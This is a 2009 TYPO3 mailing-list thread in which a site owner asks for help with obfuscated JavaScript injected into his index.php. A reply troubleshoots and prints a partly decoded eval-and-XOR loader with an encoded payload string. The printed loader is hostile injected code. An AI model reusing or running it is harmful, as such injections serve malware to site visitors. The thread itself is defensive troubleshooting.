[TYPO3-english] virus/worm on Typo3 installation.

Mon Jan 12 21:14:21 CET 2009

Hi,

The line was added to index.php. I don't understand how this has happend. 
The webserver don't have write access to the file. It but be a extension.

Best regards.
Asbjørn Morell.

"bernd wilke" <x00nsji02 at sneakemail.com> skrev i meddelelsen 
news:mailman.1.1231774859.20175.typo3-english at lists.netfielders.de...
> Am Mon, 12 Jan 2009 11:56:00 +0100 schrieb Asbjørn Morell:
>
>> Hi,
>>
>> When I open my homepage Avast antivirus gives me a warning:
>>
>> Access blocked to:
>> whitebiz.vn
>> wertionase.com
>>
>> I looked at the html source and there is some encrypted javascript at
>> the bottom. (see below) This can't be good. I tried replacing the Typo3
>> dir with a fresh source and cleared backend and frontend case. Any ideas
>> wgere this is coming from? The webserver is hosted at servage.com
>>
>> Best regards.
>> Asbjørn Morell.
>>
>> </body>
>>
>> </html><!-- ad --><script>
> [...]
>> </script><!-- /ad -->
>
> not good?
>
> this kind of encryption is a common way to secure a piece of javascript-
> code against modification or insight. But normaly you can work it out
> step by step. (use the cpu inside your head, which is better than any
> from silicone)
>
> this might be done by javascript-libraries, or your hoster (especially
> free-webspace often includes some commercials in a way you can't remove
> it)
>
> either this is included in your index.php
> or this might be inserted after your PHP-Script is run and may be
> included in every (HTML-)file on your server by 1) apache 2) proxy 3) ...
>
> try to generate a simple HTML/PHP-file in a separate directory beside
> fileadmin and look what you get if call you these files in your
> webbrowser.
>
>
>
>
>
> trying to uncrypt your code I got 'til:
>
>
> window['eval'] ( window['eval'] (
> function Alha(AID){
>    function ADA(LAHah){
>        eval("var PaTLHaH=0;");
>        var ApTl=LAHah.length;
>        eval("var AIhpGl=0;");
>        while(AIhpGl< (AID.length); HGa++){
>            var HTA=AhlTH(ApHlhD,ATlAH)^AhlTH(AaTP,HHIl);
>            var PhaAaHP=AhlTH(AID,HGa);
>            ATlAH++;
>            HHIl++;
>            if(HHIl>AaTP.length)
>                HHIl=0;
>            if(ATlAH>ApHlhD.length)
>                ATlAH=0;
>            AGATI+=String.fromCharCode(PhaAaHP^HTA) + '';
>        }
>        eval(AGATI);
>        return AGATI=null;
>    }
>    catch(e){}
> }
> Alha('%32%38%36%38%36%37%33%32%61%16%00%16%3d%36%5b%3c%6e%4e%2a%38%2d%2e%
> 78%0d%01%12%3e%53%1f%6a%34%3c%22%27%33%13%3d%3e%48%3a%10%1e%1a%27%2d%47%
> 22%32%27%12%29%13%76%6b%1a%16%25%31%75%3e%71%75%5c%66%3f%7d%3d%25%38%78%
> 74%1a%07%05%2e%72%5e%74%6f%2a%1b%30%21%27%57%1c%31%6c%16%03%07%3c%0d%3a%
> 48%3e%13%13%24%74%4b%57%3f%74%10%1e%0a%00%0e%2d%2c%7d%15%0b%2f%27%6f%79%0e
> %2f%08%2e%1e%5d%76%50%45%7d%7f%7d%2d%6c%32%39%24%12%18%0e%02%3e%1d%20%33%
> 0b%79%6b%39%25%39%1b%3e%3c%3b%08%10%3f%22%70%6b%3f%4e%7d%4d%59%15%51%37%
> 37%33%06%06%28%06%33%32%22%33%78%79%4f%3b%2f%1c%30%3a%26%55%6a%6c%56%55%4c
> %54%15%2c%22%3e%1b%36%24%0a%7a%38%11%27%02%4b%25%29%2a%3c%02%21%2a%3d%3b%
> 2b%25%73%00%7a%5b%7d%27%17%2a%3f%2c%7e%67%31%40%28%24%3b%1b%0e%39%3e%3a%
> 39%15%5a%68%3b%33%3a%34%20%3f%24%06%45%42%45%24%52%4b%33%31%08%4e%5a%6b%
> 30%6d%4d%1a%72%61%48%38%2a%59%45%03%22%22%64%23%09%3a%1d%76%43%74%6c');
> )
>
> then I get syntax-errors with the function Alha(). maybe the output of
> this function may give a hint.
>
> or you use some browser-extensions to view the generated source :-/
> !!! this may execute a possible virus !!!
>
>
> bernd
> -- 
> http://www.pi-phi.de/t3v4/cheatsheet.html 